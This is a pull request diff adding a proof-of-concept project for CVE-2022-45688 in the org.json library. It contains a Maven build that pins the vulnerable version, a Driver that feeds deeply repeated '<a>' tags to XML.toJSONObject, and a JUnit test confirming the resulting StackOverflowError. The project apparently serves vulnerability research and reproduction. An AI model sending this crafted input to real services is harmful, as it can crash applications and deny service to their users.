### PR TITLE
Add org.json:json vulnerability CVE-2022-45688

### DIFF
--- a/CVE-2022-45688/pom.xml
+++ b/CVE-2022-45688/pom.xml
@@ -1,0 +1,51 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+
+    <groupId>io.github.jensdietrich.xshady</groupId>
+    <artifactId>CVE-2022-45688</artifactId>
+    <version>1.0.0</version>
+    <packaging>jar</packaging>
+    <modelVersion>4.0.0</modelVersion>
+    <description>CVE-2022-45688 POC</description>
+    <name>CVE-2022-45688</name>
+
+    <properties>
+        <maven.compiler.target>11</maven.compiler.target>
+        <maven.compiler.source>11</maven.compiler.source>
+    </properties>
+
+    <licenses>
+        <license>
+            <name>The Apache License, Version 2.0</name>
+            <url>http://www.apache.org/licenses/LICENSE-2.0.txt</url>
+        </license>
+    </licenses>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.json</groupId>
+            <artifactId>json</artifactId>
+            <version>20220924</version>
+        </dependency>
+        <dependency>
+            <groupId>org.junit.jupiter</groupId>
+            <artifactId>junit-jupiter-api</artifactId>
+            <version>5.9.2</version>
+            <scope>test</scope>
+        </dependency>
+
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-surefire-plugin</artifactId>
+                <version>3.0.0</version>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>

--- a/CVE-2022-45688/src/main/java/Driver.java
+++ b/CVE-2022-45688/src/main/java/Driver.java
@@ -1,0 +1,15 @@
+import org.json.XML;
+
+import java.io.*;
+
+public class Driver {
+
+    public static void main (String[] args) {
+        toJson(100);
+    }
+
+    public static void toJson (int m)  {
+        String s = "<a>".repeat(m * 1024);
+        XML.toJSONObject(s);
+    }
+}

--- a/CVE-2022-45688/src/test/java/ConfirmVulnerabilitiesTests.java
+++ b/CVE-2022-45688/src/test/java/ConfirmVulnerabilitiesTests.java
@@ -1,0 +1,14 @@
+import org.junit.jupiter.api.Test;
+
+import static org.junit.jupiter.api.Assertions.assertThrows;
+
+public class ConfirmVulnerabilitiesTests {
+
+    @Test
+    public void confirmCVE202245688 () {
+        assertThrows(
+            StackOverflowError.class,
+            () -> Driver.toJson(10)
+        );
+    }
+}


### PR DESCRIPTION
Note that [https://nvd.nist.gov/vuln/detail/CVE-2022-45688] also lists `hutool` (likely `cn.hutool:hutool-json`) as affected, I picked the `org.json` artifact only.